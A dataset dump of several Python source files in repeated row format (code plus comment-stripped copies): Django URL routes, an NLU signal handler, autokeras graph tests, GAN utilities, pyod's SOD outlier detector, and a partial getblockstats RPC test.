] | null | null | null |
from django.urls import path
from . import views
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
path('settings', views.project_settings, name='settings'),
path('envs', views.os_envs, name='envs'),
]
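# Illustrative wiring (added; assumed project-level urls.py, not in this snapshot):
#     from django.urls import include, path
#     urlpatterns = [path('products/', include('products.urls'))]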
| 26
| 62
| 0.723776
|
from django.urls import path
from . import views
urlpatterns = [
path('settings', views.project_settings, name='settings'),
path('envs', views.os_envs, name='envs'),
]
| true
| true
|
790db547c7710bee45f75044da74e8e17d906927
| 1,459
|
py
|
Python
|
sagas/nlu/pipes/cat.py
|
samlet/stack
|
47db17fd4fdab264032f224dca31a4bb1d19b754
|
[
"Apache-2.0"
] | 3
|
2020-01-11T13:55:38.000Z
|
2020-08-25T22:34:15.000Z
|
sagas/nlu/pipes/cat.py
|
samlet/stack
|
47db17fd4fdab264032f224dca31a4bb1d19b754
|
[
"Apache-2.0"
] | null | null | null |
sagas/nlu/pipes/cat.py
|
samlet/stack
|
47db17fd4fdab264032f224dca31a4bb1d19b754
|
[
"Apache-2.0"
] | 1
|
2021-01-01T05:21:44.000Z
|
2021-01-01T05:21:44.000Z
|
from typing import Text, Any, Dict, List, Union
from blinker import NamedSignal, signal
import rx
from rx import operators as ops
from dataclasses import dataclass
from sagas.nlu.pipes import pred_cond, filter_path, to_token
from sagas.util.collection_util import wrap, to_obj
import logging
logger = logging.getLogger(__name__)
cat_sig=signal('cat')
@cat_sig.connect
def cat_proc(sender, **kwargs):
from sagas.nlu.utils import predicate
from sagas.nlu.translator import trans_axis
results=[]
source = rx.of(*kwargs['rs'])
lang = kwargs['lang']
cond:pred_cond=kwargs['data']
logger.debug(f"pred pos: {cond}")
kind=cond.cond
logger.debug(f"lang: {lang}, cond: {cond}")
source.pipe(
filter_path(cond.part),
ops.map(lambda t: to_obj({'word': t.text if t.upos.lower() in ['adj'] else t.lemma, **t})),
ops.map(lambda t: to_obj({'trans': trans_axis(t.word, lang, t.upos), **t})),
ops.filter(lambda t: predicate(kind, t.trans, 'en', '*')),
ops.map(lambda t: {'path':t.path,
'word': t.word,
'trans': t.trans,
'cat': kind,
'value': kind,
'pos': t.upos.lower()}),
).subscribe(
on_next=lambda value: results.append({**value}),
on_error=lambda e: logger.error(e),
)
logger.debug(f"result: {results}")
return results
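# --- Usage sketch (added for illustration; the 'rs', 'lang' and 'data' kwargs
# --- are inferred from the handler above, the token list is an assumption). ---
#     responses = cat_sig.send('caller', rs=tokens, lang='en', data=cond)
#     results = responses[0][1] # blinker returns (receiver, return_value) pairs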
| 31.042553
| 99
| 0.59767
|
from typing import Text, Any, Dict, List, Union
from blinker import NamedSignal, signal
import rx
from rx import operators as ops
from dataclasses import dataclass
from sagas.nlu.pipes import pred_cond, filter_path, to_token
from sagas.util.collection_util import wrap, to_obj
import logging
logger = logging.getLogger(__name__)
cat_sig=signal('cat')
@cat_sig.connect
def cat_proc(sender, **kwargs):
from sagas.nlu.utils import predicate
from sagas.nlu.translator import trans_axis
results=[]
source = rx.of(*kwargs['rs'])
lang = kwargs['lang']
cond:pred_cond=kwargs['data']
logger.debug(f"pred pos: {cond}")
kind=cond.cond
logger.debug(f"lang: {lang}, cond: {cond}")
source.pipe(
filter_path(cond.part),
ops.map(lambda t: to_obj({'word': t.text if t.upos.lower() in ['adj'] else t.lemma, **t})),
ops.map(lambda t: to_obj({'trans': trans_axis(t.word, lang, t.upos), **t})),
ops.filter(lambda t: predicate(kind, t.trans, 'en', '*')),
ops.map(lambda t: {'path':t.path,
'word': t.word,
'trans': t.trans,
'cat': kind,
'value': kind,
'pos': t.upos.lower()}),
).subscribe(
on_next=lambda value: results.append({**value}),
on_error=lambda e: logger.error(e),
)
logger.debug(f"result: {results}")
return results
| true
| true
|
790db59cd76ff0c3662434ff66d9e89df5351087
| 6,263
|
py
|
Python
|
tests/test_graph.py
|
MenEnger/autokeras
|
8d96979c49623f7bb56f053ed5d47b3b81f498c0
|
[
"MIT"
] | 1
|
2018-08-06T03:57:51.000Z
|
2018-08-06T03:57:51.000Z
|
tests/test_graph.py
|
MenEnger/autokeras
|
8d96979c49623f7bb56f053ed5d47b3b81f498c0
|
[
"MIT"
] | null | null | null |
tests/test_graph.py
|
MenEnger/autokeras
|
8d96979c49623f7bb56f053ed5d47b3b81f498c0
|
[
"MIT"
] | null | null | null |
from autokeras.generator import DefaultClassifierGenerator
from autokeras.graph import *
from autokeras.net_transformer import legal_graph
from tests.common import get_conv_data, get_add_skip_model, get_conv_dense_model, get_pooling_model, \
get_concat_skip_model
def test_conv_deeper_stub():
graph = get_conv_dense_model()
layer_num = graph.n_layers
graph.to_conv_deeper_model(5, 3)
assert graph.n_layers == layer_num + 4
def test_conv_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_conv_deeper_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_deeper_stub():
graph = get_conv_dense_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_dense_deeper_model(10)
assert graph.n_layers == layer_num + 3
def test_dense_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_dense_deeper_model(10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_conv_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(9, 3)
assert graph.n_layers == layer_num
def test_conv_wider():
graph = get_concat_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(32, 3)
assert graph.n_layers == layer_num
def test_dense_wider():
graph = get_add_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(32, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_add_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_add_skip_model(1, 10)
assert graph.n_layers == layer_num + 6
def test_skip_add_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_add_skip_model(1, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_concat_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_concat_skip_model(1, 14)
assert graph.n_layers == layer_num + 6
def test_skip_concat_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_concat_skip_model(5, 10)
graph.to_concat_skip_model(5, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_extract_descriptor_add():
descriptor = get_add_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.ADD_CONNECT), (3, 4, NetworkDescriptor.ADD_CONNECT)]
def test_extract_descriptor_concat():
descriptor = get_concat_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.CONCAT_CONNECT),
(3, 4, NetworkDescriptor.CONCAT_CONNECT)]
def test_deep_layer_ids():
graph = get_conv_dense_model()
assert len(graph.deep_layer_ids()) == 3
def test_wide_layer_ids():
graph = get_conv_dense_model()
assert len(graph.wide_layer_ids()) == 2
def test_skip_connection_layer_ids():
graph = get_conv_dense_model()
assert len(graph.skip_connection_layer_ids()) == 1
def test_long_transform():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
history = [('to_wider_model', 1, 256), ('to_conv_deeper_model', 1, 3),
('to_concat_skip_model', 6, 11)]
for args in history:
getattr(graph, args[0])(*list(args[1:]))
graph.produce_model()
assert legal_graph(graph)
def test_node_consistency():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
assert graph.layer_list[6].output.shape == (16, 16, 64)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_wider_model(6, 64)
assert graph.layer_list[6].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_conv_deeper_model(6, 3)
assert graph.layer_list[19].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_add_skip_model(6, 19)
assert graph.layer_list[23].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_concat_skip_model(6, 19)
assert graph.layer_list[25].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
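# --- Illustrative sketch (added; mirrors the graph morphisms the tests above exercise). ---
#     graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
#     graph.to_wider_model(1, 256) # widen layer 1 to 256 filters
#     graph.to_conv_deeper_model(1, 3) # insert a deeper conv block (kernel 3)
#     model = graph.produce_model() # materialize the graph as a torch model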
| 26.99569
| 120
| 0.695513
|
from autokeras.generator import DefaultClassifierGenerator
from autokeras.graph import *
from autokeras.net_transformer import legal_graph
from tests.common import get_conv_data, get_add_skip_model, get_conv_dense_model, get_pooling_model, \
get_concat_skip_model
def test_conv_deeper_stub():
graph = get_conv_dense_model()
layer_num = graph.n_layers
graph.to_conv_deeper_model(5, 3)
assert graph.n_layers == layer_num + 4
def test_conv_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_conv_deeper_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_deeper_stub():
graph = get_conv_dense_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_dense_deeper_model(10)
assert graph.n_layers == layer_num + 3
def test_dense_deeper():
graph = get_conv_dense_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_dense_deeper_model(10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_conv_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(9, 3)
assert graph.n_layers == layer_num
def test_conv_wider():
graph = get_concat_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(5, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-1
def test_dense_wider_stub():
graph = get_add_skip_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_wider_model(32, 3)
assert graph.n_layers == layer_num
def test_dense_wider():
graph = get_add_skip_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_wider_model(32, 3)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_add_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_add_skip_model(1, 10)
assert graph.n_layers == layer_num + 6
def test_skip_add_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_add_skip_model(1, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_skip_concat_over_pooling_stub():
graph = get_pooling_model()
graph.weighted = False
layer_num = graph.n_layers
graph.to_concat_skip_model(1, 14)
assert graph.n_layers == layer_num + 6
def test_skip_concat_over_pooling():
graph = get_pooling_model()
model = graph.produce_model()
graph = deepcopy(graph)
graph.to_concat_skip_model(5, 10)
graph.to_concat_skip_model(5, 10)
new_model = graph.produce_model()
input_data = torch.Tensor(get_conv_data())
model.eval()
new_model.eval()
output1 = model(input_data)
output2 = new_model(input_data)
assert (output1 - output2).abs().sum() < 1e-4
def test_extract_descriptor_add():
descriptor = get_add_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.ADD_CONNECT), (3, 4, NetworkDescriptor.ADD_CONNECT)]
def test_extract_descriptor_concat():
descriptor = get_concat_skip_model().extract_descriptor()
assert descriptor.n_conv == 5
assert descriptor.n_dense == 2
assert descriptor.skip_connections == [(2, 3, NetworkDescriptor.CONCAT_CONNECT),
(3, 4, NetworkDescriptor.CONCAT_CONNECT)]
def test_deep_layer_ids():
graph = get_conv_dense_model()
assert len(graph.deep_layer_ids()) == 3
def test_wide_layer_ids():
graph = get_conv_dense_model()
assert len(graph.wide_layer_ids()) == 2
def test_skip_connection_layer_ids():
graph = get_conv_dense_model()
assert len(graph.skip_connection_layer_ids()) == 1
def test_long_transform():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
history = [('to_wider_model', 1, 256), ('to_conv_deeper_model', 1, 3),
('to_concat_skip_model', 6, 11)]
for args in history:
getattr(graph, args[0])(*list(args[1:]))
graph.produce_model()
assert legal_graph(graph)
def test_node_consistency():
graph = DefaultClassifierGenerator(10, (32, 32, 3)).generate()
assert graph.layer_list[6].output.shape == (16, 16, 64)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_wider_model(6, 64)
assert graph.layer_list[6].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_conv_deeper_model(6, 3)
assert graph.layer_list[19].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_add_skip_model(6, 19)
assert graph.layer_list[23].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
graph.to_concat_skip_model(6, 19)
assert graph.layer_list[25].output.shape == (16, 16, 128)
for layer in graph.layer_list:
assert layer.output.shape == layer.output_shape
| true
| true
|
790db5e4ea2ac9b7b978a97d923cc49dca6e6b37
| 1,837
|
py
|
Python
|
src/util.py
|
lukamaletin/multi-gan
|
53b37c840d74ed0a9db888a03a5bed59ad33bc8e
|
[
"MIT"
] | null | null | null |
src/util.py
|
lukamaletin/multi-gan
|
53b37c840d74ed0a9db888a03a5bed59ad33bc8e
|
[
"MIT"
] | null | null | null |
src/util.py
|
lukamaletin/multi-gan
|
53b37c840d74ed0a9db888a03a5bed59ad33bc8e
|
[
"MIT"
] | null | null | null |
import os
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
def make_trainable(net, val):
net.trainable = val
for layer in net.layers:
layer.trainable = val
def plot_loss(losses):
plt.figure(figsize=(10, 8))
plt.plot(losses['g'], label='generative loss')
plt.plot(losses['d'], label='discriminative loss')
plt.legend()
plt.show()
def render_bboxes(bboxes_batch, labels_batch, shape):
renders = []
for i in range(len(bboxes_batch)):
bboxes = bboxes_batch[i]
labels = labels_batch[i]
canvas = np.zeros(shape, dtype=np.float32)
canvas += 255
for j in range(len(bboxes)):
bbox = bboxes[j]
top, left, bottom, right = bbox
label = labels[j]
color = (np.where(label==1)[0][0] + 1) * 10
canvas[top:bottom, left:right, 0] = color
canvas /= 255
renders.append(canvas)
return np.array(renders)
def save_batch(images, epoch, path, suffix=''):
samples_path = os.path.join(path, 'samples')
if not os.path.exists(samples_path):
os.makedirs(samples_path)
num_images = images.shape[0]
num_rows = images.shape[1]
num_cols = images.shape[2]
canvas = np.zeros((num_rows, num_images * num_cols, 1), dtype=images.dtype)
for i in range(num_images):
canvas[0:num_rows, i * num_cols:(i + 1) * num_cols] = images[i]
img = canvas
img *= 255
img = Image.fromarray(np.squeeze(img))
img = img.convert('L')
img.save(samples_path + f'/{epoch}_{suffix}.png')
def load_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.load_weights(model_path)
def save_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.save_weights(model_path)
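# --- Usage sketch (added for illustration; the output path is an assumption). ---
#     import numpy as np
#     batch = np.random.rand(4, 28, 28, 1).astype(np.float32) # values in [0, 1]
#     save_batch(batch, epoch=0, path='output') # writes output/samples/0_.png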
| 25.513889
| 79
| 0.623299
|
import os
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
def make_trainable(net, val):
net.trainable = val
for layer in net.layers:
layer.trainable = val
def plot_loss(losses):
plt.figure(figsize=(10, 8))
plt.plot(losses['g'], label='generative loss')
plt.plot(losses['d'], label='discriminative loss')
plt.legend()
plt.show()
def render_bboxes(bboxes_batch, labels_batch, shape):
renders = []
for i in range(len(bboxes_batch)):
bboxes = bboxes_batch[i]
labels = labels_batch[i]
canvas = np.zeros(shape, dtype=np.float32)
canvas += 255
for j in range(len(bboxes)):
bbox = bboxes[j]
top, left, bottom, right = bbox
label = labels[j]
color = (np.where(label==1)[0][0] + 1) * 10
canvas[top:bottom, left:right, 0] = color
canvas /= 255
renders.append(canvas)
return np.array(renders)
def save_batch(images, epoch, path, suffix=''):
samples_path = os.path.join(path, 'samples')
if not os.path.exists(samples_path):
os.makedirs(samples_path)
num_images = images.shape[0]
num_rows = images.shape[1]
num_cols = images.shape[2]
canvas = np.zeros((num_rows, num_images * num_cols, 1), dtype=images.dtype)
for i in range(num_images):
canvas[0:num_rows, i * num_cols:(i + 1) * num_cols] = images[i]
img = canvas
img *= 255
img = Image.fromarray(np.squeeze(img))
img = img.convert('L')
img.save(samples_path + f'/{epoch}_{suffix}.png')
def load_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.load_weights(model_path)
def save_model(model, path, name):
model_path = os.path.join(path, name + '.h5')
model.save_weights(model_path)
| true
| true
|
790db5f7909e370ab4ab9fd0569746d419b73c10
| 7,068
|
py
|
Python
|
pyod/models/sod.py
|
GBR-613/pyod
|
bfbb297ac067c47488bcade77669c99de5a4838a
|
[
"BSD-2-Clause"
] | 5,126
|
2018-11-09T06:05:38.000Z
|
2022-03-31T14:25:14.000Z
|
pyod/models/sod.py
|
durgeshsamariya/pyod
|
dfafc57f74dc3d49d0166f21ab2ddb97e3d1d898
|
[
"BSD-2-Clause"
] | 325
|
2018-11-14T20:02:39.000Z
|
2022-03-30T22:49:38.000Z
|
pyod/models/sod.py
|
durgeshsamariya/pyod
|
dfafc57f74dc3d49d0166f21ab2ddb97e3d1d898
|
[
"BSD-2-Clause"
] | 1,049
|
2018-11-09T06:12:12.000Z
|
2022-03-31T06:21:28.000Z
|
# -*- coding: utf-8 -*-
"""Subspace Outlier Detection (SOD)
"""
# Author: Yahya Almardeny <almardeny@gmail.com>
# License: BSD 2 clause
import numpy as np
import numba as nb
from sklearn.neighbors import NearestNeighbors
from sklearn.utils import check_array
from ..utils.utility import check_parameter
from .base import BaseDetector
@nb.njit(parallel=True)
def _snn_imp(ind, ref_set_):
"""Internal function for fast snn calculation
Parameters
----------
ind : int
Indices return by kNN.
ref_set_ : int, optional (default=10)
specifies the number of shared nearest neighbors to create the
reference set. Note that ref_set must be smaller than n_neighbors.
"""
n = ind.shape[0]
_count = np.zeros(shape=(n, ref_set_), dtype=np.uint32)
for i in nb.prange(n):
temp = np.empty(n, dtype=np.uint32)
test_element_set = set(ind[i])
for j in nb.prange(n):
temp[j] = len(set(ind[j]).intersection(test_element_set))
temp[i] = np.iinfo(np.uint32).max
_count[i] = np.argsort(temp)[::-1][1:ref_set_ + 1]
return _count
class SOD(BaseDetector):
"""Subspace outlier detection (SOD) schema aims to detect outlier in
varying subspaces of a high dimensional feature space. For each data
object, SOD explores the axis-parallel subspace spanned by the data
object's neighbors and determines how much the object deviates from the
neighbors in this subspace.
See :cite:`kriegel2009outlier` for details.
Parameters
----------
n_neighbors : int, optional (default=20)
Number of neighbors to use by default for k neighbors queries.
ref_set: int, optional (default=10)
specifies the number of shared nearest neighbors to create the
reference set. Note that ref_set must be smaller than n_neighbors.
alpha: float in (0., 1.), optional (default=0.8)
specifies the lower limit for selecting subspace.
0.8 is set as default as suggested in the original paper.
contamination : float in (0., 0.5), optional (default=0.1)
The amount of contamination of the data set, i.e.
the proportion of outliers in the data set. Used when fitting to
define the threshold on the decision function.
Attributes
----------
decision_scores_ : numpy array of shape (n_samples,)
The outlier scores of the training data.
The higher, the more abnormal. Outliers tend to have higher
scores. This value is available once the detector is
fitted.
threshold_ : float
The threshold is based on ``contamination``. It is the
``n_samples * contamination`` most abnormal samples in
``decision_scores_``. The threshold is calculated for generating
binary outlier labels.
labels_ : int, either 0 or 1
The binary labels of the training data. 0 stands for inliers
and 1 for outliers/anomalies. It is generated by applying
``threshold_`` on ``decision_scores_``.
"""
def __init__(self, contamination=0.1, n_neighbors=20, ref_set=10,
alpha=0.8):
super(SOD, self).__init__(contamination=contamination)
if isinstance(n_neighbors, int):
check_parameter(n_neighbors, low=1, param_name='n_neighbors')
else:
raise ValueError(
"n_neighbors should be int. Got %s" % type(n_neighbors))
if isinstance(ref_set, int):
check_parameter(ref_set, low=1, high=n_neighbors,
param_name='ref_set')
else:
raise ValueError("ref_set should be int. Got %s" % type(ref_set))
if isinstance(alpha, float):
check_parameter(alpha, low=0.0, high=1.0, param_name='alpha')
else:
raise ValueError("alpha should be float. Got %s" % type(alpha))
self.n_neighbors_ = n_neighbors
self.ref_set_ = ref_set
self.alpha_ = alpha
self.decision_scores_ = None
def fit(self, X, y=None):
"""Fit detector. y is ignored in unsupervised methods.
Parameters
----------
X : numpy array of shape (n_samples, n_features)
The input samples.
y : Ignored
Not used, present for API consistency by convention.
Returns
-------
self : object
Fitted estimator.
"""
# validate inputs X and y (optional)
X = check_array(X)
self._set_n_classes(y)
self.decision_scores_ = self.decision_function(X)
self._process_decision_scores()
return self
def decision_function(self, X):
"""Predict raw anomaly score of X using the fitted detector.
The anomaly score of an input sample is computed based on different
detector algorithms. For consistency, outliers are assigned with
larger anomaly scores.
Parameters
----------
X : numpy array of shape (n_samples, n_features)
The training input samples. Sparse matrices are accepted only
if they are supported by the base estimator.
Returns
-------
anomaly_scores : numpy array of shape (n_samples,)
The anomaly score of the input samples.
"""
return self._sod(X)
def _snn(self, X):
"""This function is called internally to calculate the shared nearest
neighbors (SNN). SNN is reported to be more robust than k nearest
neighbors.
Returns
-------
snn_indices : numpy array of shape (n_shared_nearest_neighbors,)
The indices of top k shared nearest neighbors for each observation.
"""
knn = NearestNeighbors(n_neighbors=self.n_neighbors_)
knn.fit(X)
# Get the knn index
ind = knn.kneighbors(return_distance=False)
return _snn_imp(ind, self.ref_set_)
def _sod(self, X):
"""This function is called internally to perform subspace outlier
detection algorithm.
Returns
-------
anomaly_scores : numpy array of shape (n_samples,)
The anomaly score of the input samples.
"""
ref_inds = self._snn(X)
anomaly_scores = np.zeros(shape=(X.shape[0],))
for i in range(X.shape[0]):
obs = X[i]
ref = X[ref_inds[i,],]
means = np.mean(ref, axis=0) # mean of each column
# average squared distance of the reference to the mean
var_total = np.sum(np.sum(np.square(ref - means))) / self.ref_set_
var_expect = self.alpha_ * var_total / X.shape[1]
var_actual = np.var(ref, axis=0) # variance of each attribute
var_inds = [1 if (j < var_expect) else 0 for j in var_actual]
rel_dim = np.sum(var_inds)
if rel_dim != 0:
anomaly_scores[i] = np.sqrt(
np.dot(var_inds, np.square(obs - means)) / rel_dim)
return anomaly_scores
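# --- Usage sketch (added for illustration; assumes pyod is installed). ---
#     import numpy as np
#     from pyod.models.sod import SOD
#     X = np.random.RandomState(0).rand(100, 10)
#     clf = SOD(contamination=0.1, n_neighbors=20, ref_set=10, alpha=0.8)
#     clf.fit(X)
#     clf.decision_scores_[:5] # higher score = more anomalous
#     clf.labels_[:5] # 1 flags roughly the top 10% as outliers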
| 35.164179
| 79
| 0.621817
|
import numpy as np
import numba as nb
from sklearn.neighbors import NearestNeighbors
from sklearn.utils import check_array
from ..utils.utility import check_parameter
from .base import BaseDetector
@nb.njit(parallel=True)
def _snn_imp(ind, ref_set_):
n = ind.shape[0]
_count = np.zeros(shape=(n, ref_set_), dtype=np.uint32)
for i in nb.prange(n):
temp = np.empty(n, dtype=np.uint32)
test_element_set = set(ind[i])
for j in nb.prange(n):
temp[j] = len(set(ind[j]).intersection(test_element_set))
temp[i] = np.iinfo(np.uint32).max
_count[i] = np.argsort(temp)[::-1][1:ref_set_ + 1]
return _count
class SOD(BaseDetector):
def __init__(self, contamination=0.1, n_neighbors=20, ref_set=10,
alpha=0.8):
super(SOD, self).__init__(contamination=contamination)
if isinstance(n_neighbors, int):
check_parameter(n_neighbors, low=1, param_name='n_neighbors')
else:
raise ValueError(
"n_neighbors should be int. Got %s" % type(n_neighbors))
if isinstance(ref_set, int):
check_parameter(ref_set, low=1, high=n_neighbors,
param_name='ref_set')
else:
raise ValueError("ref_set should be int. Got %s" % type(ref_set))
if isinstance(alpha, float):
check_parameter(alpha, low=0.0, high=1.0, param_name='alpha')
else:
raise ValueError("alpha should be float. Got %s" % type(alpha))
self.n_neighbors_ = n_neighbors
self.ref_set_ = ref_set
self.alpha_ = alpha
self.decision_scores_ = None
def fit(self, X, y=None):
X = check_array(X)
self._set_n_classes(y)
self.decision_scores_ = self.decision_function(X)
self._process_decision_scores()
return self
def decision_function(self, X):
return self._sod(X)
def _snn(self, X):
knn = NearestNeighbors(n_neighbors=self.n_neighbors_)
knn.fit(X)
ind = knn.kneighbors(return_distance=False)
return _snn_imp(ind, self.ref_set_)
def _sod(self, X):
ref_inds = self._snn(X)
anomaly_scores = np.zeros(shape=(X.shape[0],))
for i in range(X.shape[0]):
obs = X[i]
ref = X[ref_inds[i,],]
means = np.mean(ref, axis=0)
var_total = np.sum(np.sum(np.square(ref - means))) / self.ref_set_
var_expect = self.alpha_ * var_total / X.shape[1]
var_actual = np.var(ref, axis=0)
var_inds = [1 if (j < var_expect) else 0 for j in var_actual]
rel_dim = np.sum(var_inds)
if rel_dim != 0:
anomaly_scores[i] = np.sqrt(
np.dot(var_inds, np.square(obs - means)) / rel_dim)
return anomaly_scores
| true
| true
|
790db68297454438cd4748af30d715a7558e6fe2
| 7,042
|
py
|
Python
|
test/functional/rpc_getblockstats.py
|
blinkhash/blinkhash-core
|
e05662019c2fa4cb2dc3736f38e48492712c23b1
|
[
"MIT"
] | 3
|
2021-07-27T16:59:47.000Z
|
2021-12-31T20:55:46.000Z
|
test/functional/rpc_getblockstats.py
|
blinkhash/blinkhash-core
|
e05662019c2fa4cb2dc3736f38e48492712c23b1
|
[
"MIT"
] | null | null | null |
test/functional/rpc_getblockstats.py
|
blinkhash/blinkhash-core
|
e05662019c2fa4cb2dc3736f38e48492712c23b1
|
[
"MIT"
] | 1
|
2021-12-31T12:58:23.000Z
|
2021-12-31T12:58:23.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test getblockstats rpc call
#
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
import json
import os
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(BlinkhashTestFramework):
start_height = 101
max_stat_pos = 2
def add_options(self, parser):
parser.add_argument('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_argument('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
def generate_test_data(self, filename):
mocktime = 1525107225
self.nodes[0].setmocktime(mocktime)
self.nodes[0].createwallet(wallet_name="testwallet")
self.nodes[0].generatetoaddress(COINBASE_MATURITY + 1, self.nodes[0].getnewaddress())
address = self.nodes[0].get_deterministic_priv_key().address
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.generate(self.nodes[0], 1)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=False)
self.nodes[0].settxfee(amount=0.003)
self.nodes[0].sendtoaddress(address=address, amount=1, subtractfeefromamount=True)
self.sync_all()
self.generate(self.nodes[0], 1)
self.expected_stats = self.get_stats()
blocks = []
tip = self.nodes[0].getbestblockhash()
blockhash = None
height = 0
while tip != blockhash:
blockhash = self.nodes[0].getblockhash(height)
blocks.append(self.nodes[0].getblock(blockhash, 0))
height += 1
to_dump = {
'blocks': blocks,
'mocktime': int(mocktime),
'stats': self.expected_stats,
}
with open(filename, 'w', encoding="utf8") as f:
json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r', encoding="utf8") as f:
